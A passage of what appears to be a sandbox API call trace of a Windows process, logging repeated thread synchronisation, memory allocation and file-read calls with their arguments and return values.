lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0277.172] SetEvent (hEvent=0x138) returned 1 [0277.172] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0277.173] timeEndPeriod (uPeriod=0x1) returned 0x0 [0277.173] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0279.697] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0279.698] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0279.698] SetEvent (hEvent=0x138) returned 1 [0279.698] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0279.708] timeEndPeriod (uPeriod=0x1) returned 0x0 [0279.709] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0282.353] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0282.353] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0282.353] SetEvent (hEvent=0x138) returned 1 [0282.353] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0282.355] timeEndPeriod (uPeriod=0x1) returned 0x0 [0282.355] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0284.774] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0284.775] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0284.775] SetEvent (hEvent=0x138) returned 1 [0284.775] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0284.776] timeEndPeriod (uPeriod=0x1) returned 0x0 [0284.776] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0286.926] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0286.926] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0286.926] SetEvent (hEvent=0x138) returned 1 [0286.927] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0286.938] timeEndPeriod (uPeriod=0x1) returned 0x0 [0286.938] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0289.563] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0289.567] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0289.567] SetEvent (hEvent=0x138) returned 1 [0289.568] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0289.575] timeEndPeriod (uPeriod=0x1) returned 0x0 [0289.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0292.013] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0292.015] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0292.016] SetEvent (hEvent=0x138) returned 1 [0292.016] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0292.017] timeEndPeriod (uPeriod=0x1) returned 0x0 [0292.017] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0294.346] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0294.346] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0294.347] SetEvent (hEvent=0x138) returned 1 [0294.347] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0294.474] timeEndPeriod (uPeriod=0x1) returned 0x0 [0294.475] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0295.067] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0295.067] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0295.067] SetEvent (hEvent=0x138) returned 1 [0295.067] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0295.072] timeEndPeriod (uPeriod=0x1) returned 0x0 [0295.073] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0297.177] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0297.177] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0297.178] SetEvent (hEvent=0x138) returned 1 [0297.178] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0297.186] timeEndPeriod (uPeriod=0x1) returned 0x0 [0297.187] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0299.297] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0299.297] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0299.297] SetEvent (hEvent=0x138) returned 1 [0299.297] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0299.298] timeEndPeriod (uPeriod=0x1) returned 0x0 [0299.298] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0302.069] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0302.070] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0302.070] SetEvent (hEvent=0x138) returned 1 [0302.070] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0302.079] timeEndPeriod (uPeriod=0x1) returned 0x0 [0302.081] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0304.370] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.370] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0304.370] SetEvent (hEvent=0x138) returned 1 [0304.370] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0304.371] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.372] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0306.301] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.301] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0306.302] SetEvent (hEvent=0x138) returned 1 [0306.302] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0306.311] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.311] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0307.918] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.918] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0307.918] SetEvent (hEvent=0x138) returned 1 [0307.918] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0307.927] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.927] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0309.440] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.441] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0309.441] SetEvent (hEvent=0x138) returned 1 [0309.441] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0309.450] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.450] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0311.214] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.214] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0311.214] SetEvent (hEvent=0x138) returned 1 [0311.214] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0311.280] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.280] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0311.430] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0311.430] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0311.430] SetEvent (hEvent=0x138) returned 1 [0311.430] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0311.434] timeEndPeriod (uPeriod=0x1) returned 0x0 [0311.434] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0313.504] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0313.504] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0313.505] SetEvent (hEvent=0x138) returned 1 [0313.505] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0313.511] timeEndPeriod (uPeriod=0x1) returned 0x0 [0313.511] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0315.652] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.652] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10e0faf0, ulCount=0x10, ulNumEntriesRemoved=0x10e0fad4, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x10e0faf0, ulNumEntriesRemoved=0x10e0fad4) returned 0 [0315.653] SetEvent (hEvent=0x138) returned 1 [0315.653] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x10e0fee4) returned 0x102 [0315.697] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.698] WaitForMultipleObjects (nCount=0x2, lpHandles=0x10e0fea8*=0x174, bWaitAll=0, dwMilliseconds=0xea60) Thread: id = 4 os_tid = 0x101c [0090.073] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x10f0ff28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x10f0ff28*=0x134) returned 1 [0090.073] VirtualQuery (in: lpAddress=0x10f0ff38, lpBuffer=0x10f0ff38, dwLength=0x1c | out: lpBuffer=0x10f0ff38*(BaseAddress=0x10f0f000, AllocationBase=0x10e10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.073] VirtualAlloc (lpAddress=0x11080000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11080000 [0090.073] VirtualAlloc (lpAddress=0x11082000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11082000 [0090.073] VirtualAlloc (lpAddress=0x11084000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11084000 [0090.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457b20, lpParameter=0x11080000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0090.074] CloseHandle (hObject=0x138) returned 1 [0090.074] SetEvent (hEvent=0x128) returned 1 [0090.074] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x138 [0090.074] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x13c [0090.074] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.135] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.182] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.311] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0091.312] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0092.187] GetQueuedCompletionStatusEx (in: CompletionPort=0x194, lpCompletionPortEntries=0x10f0fa58, ulCount=0x10, ulNumEntriesRemoved=0x10f0fa3c, dwMilliseconds=0xe9e5, fAlertable=0 | out: lpCompletionPortEntries=0x10f0fa58, ulNumEntriesRemoved=0x10f0fa3c) returned 0 [0152.072] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0199.035] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0217.892] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0236.224] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0236.267] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0249.663] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0256.209] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0256.738] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0256.783] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0257.125] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0257.317] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0275.016] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0277.173] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0279.699] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0282.355] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0284.776] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0286.927] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0289.568] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0292.017] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0294.474] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0295.072] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0297.178] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0299.298] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0302.071] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0304.371] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0306.302] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0307.919] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0309.441] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0311.280] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0311.431] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0313.511] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) returned 0x0 [0315.689] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0xffffffff) Thread: id = 5 os_tid = 0xa70 [0090.075] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x310fff28, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x310fff28*=0x140) returned 1 [0090.075] VirtualQuery (in: lpAddress=0x310fff38, lpBuffer=0x310fff38, dwLength=0x1c | out: lpBuffer=0x310fff38*(BaseAddress=0x310ff000, AllocationBase=0x31000000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0090.075] VirtualAlloc (lpAddress=0x11038000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11038000 [0090.075] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x144 [0090.075] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x148 [0090.075] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0091.134] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0099.111] VirtualAlloc (lpAddress=0x1111c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1111c000 [0099.111] VirtualAlloc (lpAddress=0x1111e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1111e000 [0099.112] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x457b20, lpParameter=0x1111c000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x180 [0099.112] CloseHandle (hObject=0x180) returned 1 [0099.112] ReadFile (in: hFile=0x188, lpBuffer=0x111048c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x111048c0*, lpNumberOfBytesRead=0x11072edc*=0x21, lpOverlapped=0x0) returned 1 [0226.691] SetEvent (hEvent=0x174) returned 1 [0226.691] ReadFile (in: hFile=0x188, lpBuffer=0x11104ac0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11072edc, lpOverlapped=0x0 | out: lpBuffer=0x11104ac0*, lpNumberOfBytesRead=0x11072edc*=0x2, lpOverlapped=0x0) returned 1 [0226.691] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0227.289] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0236.224] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086340, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086340*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0256.726] SetEvent (hEvent=0x174) returned 1 [0256.726] ReadFile (in: hFile=0x1a8, lpBuffer=0x110864c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x110864c0*, lpNumberOfBytesRead=0x11073edc*=0x37, lpOverlapped=0x0) returned 1 [0256.727] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086540, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086540*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0256.766] SetEvent (hEvent=0x174) returned 1 [0256.766] ReadFile (in: hFile=0x1a8, lpBuffer=0x110865c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x110865c0*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0256.766] VirtualAlloc (lpAddress=0x110e4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110e4000 [0256.767] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086640, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086640*, lpNumberOfBytesRead=0x11073edc*=0x13, lpOverlapped=0x0) returned 1 [0256.767] VirtualAlloc (lpAddress=0x110e6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110e6000 [0256.768] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086680, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086680*, lpNumberOfBytesRead=0x11073edc*=0x28, lpOverlapped=0x0) returned 1 [0257.117] SetEvent (hEvent=0x174) returned 1 [0257.118] VirtualAlloc (lpAddress=0x110e8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110e8000 [0257.118] ReadFile (in: hFile=0x1a8, lpBuffer=0x110866c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x110866c0*, lpNumberOfBytesRead=0x11073edc*=0x28, lpOverlapped=0x0) returned 1 [0257.311] SetEvent (hEvent=0x174) returned 1 [0257.311] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086700, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086700*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0275.012] SetEvent (hEvent=0x174) returned 1 [0275.013] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086740, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086740*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0277.167] SetEvent (hEvent=0x174) returned 1 [0277.167] VirtualAlloc (lpAddress=0x110ea000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ea000 [0277.168] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086780, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086780*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0279.694] SetEvent (hEvent=0x174) returned 1 [0279.695] VirtualAlloc (lpAddress=0x110ec000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ec000 [0279.696] ReadFile (in: hFile=0x1a8, lpBuffer=0x110867c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x110867c0*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0282.336] SetEvent (hEvent=0x174) returned 1 [0282.337] VirtualAlloc (lpAddress=0x110ee000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ee000 [0282.337] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086800, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086800*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0284.771] SetEvent (hEvent=0x174) returned 1 [0284.772] VirtualAlloc (lpAddress=0x110f0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110f0000 [0284.773] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086840, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086840*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0286.925] SetEvent (hEvent=0x174) returned 1 [0286.925] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086880, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086880*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0289.562] SetEvent (hEvent=0x174) returned 1 [0289.562] ReadFile (in: hFile=0x1a8, lpBuffer=0x110868c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x110868c0*, lpNumberOfBytesRead=0x11073edc*=0x1c, lpOverlapped=0x0) returned 1 [0292.011] SetEvent (hEvent=0x174) returned 1 [0292.012] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086900, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086900*, lpNumberOfBytesRead=0x11073edc*=0x40, lpOverlapped=0x0) returned 1 [0294.334] SetEvent (hEvent=0x174) returned 1 [0294.335] VirtualAlloc (lpAddress=0x110f2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110f2000 [0294.336] ReadFile (in: hFile=0x1a8, lpBuffer=0x11086980, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x11073edc, lpOverlapped=0x0 | out: lpBuffer=0x11086980*, lpNumberOfBytesRead=0x11073edc*=0x10, lpOverlapped=0x0) returned 1 [0294.336] VirtualAlloc (lpAddress=0x110f4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x110f4000 [0294.337] 